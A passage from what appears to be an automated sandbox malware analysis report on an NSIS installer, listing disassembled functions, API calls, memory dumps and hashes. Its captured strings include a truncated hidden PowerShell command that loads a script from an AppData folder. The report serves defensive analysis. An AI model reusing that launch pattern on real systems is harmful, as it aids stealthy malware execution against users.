                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                  • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                                  • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                  • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 575 403027-40303e 576 403040 575->576 577 403047-40304f 575->577 576->577 578 403051 577->578 579 403056-40305b 577->579 578->579 580 40306b-403078 call 40320c 579->580 581 40305d-403066 call 403222 579->581 585 4031c3 580->585 586 40307e-403082 580->586 581->580 589 4031c5-4031c6 585->589 587 403088-4030a8 GetTickCount call 406513 586->587 588 4031ac-4031ae 586->588 599 403202 587->599 601 4030ae-4030b6 587->601 590 4031b0-4031b3 588->590 591 4031f7-4031fb 588->591 593 403205-403209 589->593 594 4031b5 590->594 595 4031b8-4031c1 call 40320c 590->595 596 4031c8-4031ce 591->596 597 4031fd 591->597 594->595 595->585 608 4031ff 595->608 602 4031d0 596->602 603 4031d3-4031e1 call 40320c 596->603 597->599 599->593 605 4030b8 601->605 606 4030bb-4030c9 call 40320c 601->606 602->603 603->585 612 4031e3-4031ef call 405ca1 603->612 605->606 606->585 613 4030cf-4030d8 606->613 608->599 617 4031f1-4031f4 612->617 618 4031a8-4031aa 612->618 616 4030de-4030fb call 406533 613->616 621 403101-403118 GetTickCount 616->621 622 4031a4-4031a6 616->622 617->591 618->589 623 403163-403165 621->623 624 40311a-403122 621->624 622->589 627 403167-40316b 623->627 628 403198-40319c 623->628 625 403124-403128 624->625 626 40312a-403160 MulDiv wsprintfW call 405179 624->626 625->623 625->626 626->623 630 403180-403186 627->630 631 40316d-403172 call 405ca1 627->631 628->601 632 4031a2 628->632 635 40318c-403190 630->635 636 403177-403179 631->636 632->599 635->616 637 403196 635->637 636->618 638 40317b-40317e 636->638 637->599 638->635
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 551687249-2449383134
                                                  • Opcode ID: f45aa94e9ca3f729f654a854a39d64f46a65b467177f379726bcb4e7b6349377
                                                  • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                                  • Opcode Fuzzy Hash: f45aa94e9ca3f729f654a854a39d64f46a65b467177f379726bcb4e7b6349377
                                                  • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 639 405c1e-405c2a 640 405c2b-405c5f GetTickCount GetTempFileNameW 639->640 641 405c61-405c63 640->641 642 405c6e-405c70 640->642 641->640 643 405c65 641->643 644 405c68-405c6b 642->644 643->644
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405C3C
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
                                                  • nsa, xrefs: 00405C2B
                                                  • "C:\Users\user\Desktop\x295IO8kqM.exe", xrefs: 00405C1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\x295IO8kqM.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-2683669424
                                                  • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                  • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                  • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                  • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 645 405ee7-405f19 RegOpenKeyExW 646 405f5b-405f5e 645->646 647 405f1b-405f3a RegQueryValueExW 645->647 648 405f48 647->648 649 405f3c-405f40 647->649 650 405f4b-405f55 RegCloseKey 648->650 649->650 651 405f42-405f46 649->651 650->646 651->648 651->650
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Execute: ,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405F11
                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405F32
                                                  • RegCloseKey.KERNELBASE(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Execute: ,?), ref: 00405F55
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Execute:
                                                  • API String ID: 3677997916-3756222843
                                                  • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                  • Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
                                                  • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                  • Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 652 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 659 4023c7-4023cf 652->659 660 402a4c-402a5b 652->660 662 4023d1-4023de call 402bbf lstrlenW 659->662 663 4023e2-4023e5 659->663 662->663 666 4023f5-4023f8 663->666 667 4023e7-4023f4 call 402ba2 663->667 668 402409-40241d RegSetValueExW 666->668 669 4023fa-402404 call 403027 666->669 667->666 673 402422-4024fc RegCloseKey 668->673 674 40241f 668->674 669->668 673->660 674->673
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                  • lstrlenW.KERNEL32(0040A5A8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID:
                                                  • API String ID: 1356686001-0
                                                  • Opcode ID: 1cb76489f499a60fc31bd427d01369f4a38a3666a47e6236141cba30418afda1
                                                  • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                  • Opcode Fuzzy Hash: 1cb76489f499a60fc31bd427d01369f4a38a3666a47e6236141cba30418afda1
                                                  • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 677 401e66-401e77 call 402bbf call 405179 call 4056fa 683 401e7c-401e81 677->683 684 401e87-401e8a 683->684 685 40281e-402825 683->685 686 401edb-401ee4 CloseHandle 684->686 687 401e8c-401e9c WaitForSingleObject 684->687 688 402a4c-402a5b 685->688 686->688 690 401eac-401eae 687->690 692 401eb0-401ec0 GetExitCodeProcess 690->692 693 401e9e-401eaa call 406430 WaitForSingleObject 690->693 695 401ec2-401ecd call 405f61 692->695 696 401ecf-401ed2 692->696 693->690 695->686 696->686 699 401ed4 696->699 699->686
                                                  APIs
                                                    • Part of subcall function 00405179: lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                    • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                    • Part of subcall function 00405179: lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00403160,00403160,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,00000000,0040FEA0,00000000), ref: 004051D4
                                                    • Part of subcall function 00405179: SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl,Execute: "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Decl), ref: 004051E6
                                                    • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                    • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                    • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                    • Part of subcall function 004056FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                    • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3585118688-0
                                                  • Opcode ID: 99993a3cbce603c9c2666e4d9bed690e5adb13853b6fb756e5b4bd593d41ca7a
                                                  • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                  • Opcode Fuzzy Hash: 99993a3cbce603c9c2666e4d9bed690e5adb13853b6fb756e5b4bd593d41ca7a
                                                  • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                                  APIs
                                                    • Part of subcall function 00405A79: CharNextW.USER32(?,?,00424EF0,?,00405AED,00424EF0,00424EF0,76CF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76CF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                    • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                    • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                    • Part of subcall function 00405648: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\woady\roadshow,?,00000000,000000F0), ref: 00401645
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\woady\roadshow, xrefs: 00401638
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\woady\roadshow
                                                  • API String ID: 1892508949-699694329
                                                  • Opcode ID: 2c257be04e91d0cc14304221d44cf70864c5afaea6008504908cd05694a0bc63
                                                  • Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
                                                  • Opcode Fuzzy Hash: 2c257be04e91d0cc14304221d44cf70864c5afaea6008504908cd05694a0bc63
                                                  • Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E
                                                  APIs
                                                    • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                    • Part of subcall function 00405A79: CharNextW.USER32(?,?,00424EF0,?,00405AED,00424EF0,00424EF0,76CF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76CF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                    • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                    • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                  • lstrlenW.KERNEL32(00424EF0,00000000,00424EF0,00424EF0,76CF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76CF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
                                                  • GetFileAttributesW.KERNELBASE(00424EF0,00424EF0,00424EF0,00424EF0,00424EF0,00424EF0,00000000,00424EF0,00424EF0,76CF3420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,76CF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AD6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3248276644-3355392842
                                                  • Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                  • Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
                                                  • Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                  • Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                  • CloseHandle.KERNEL32(?), ref: 00405730
                                                  Strings
                                                  • Error launching installer, xrefs: 0040570D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                  • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                  • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                  • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                  • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                  • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                  • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
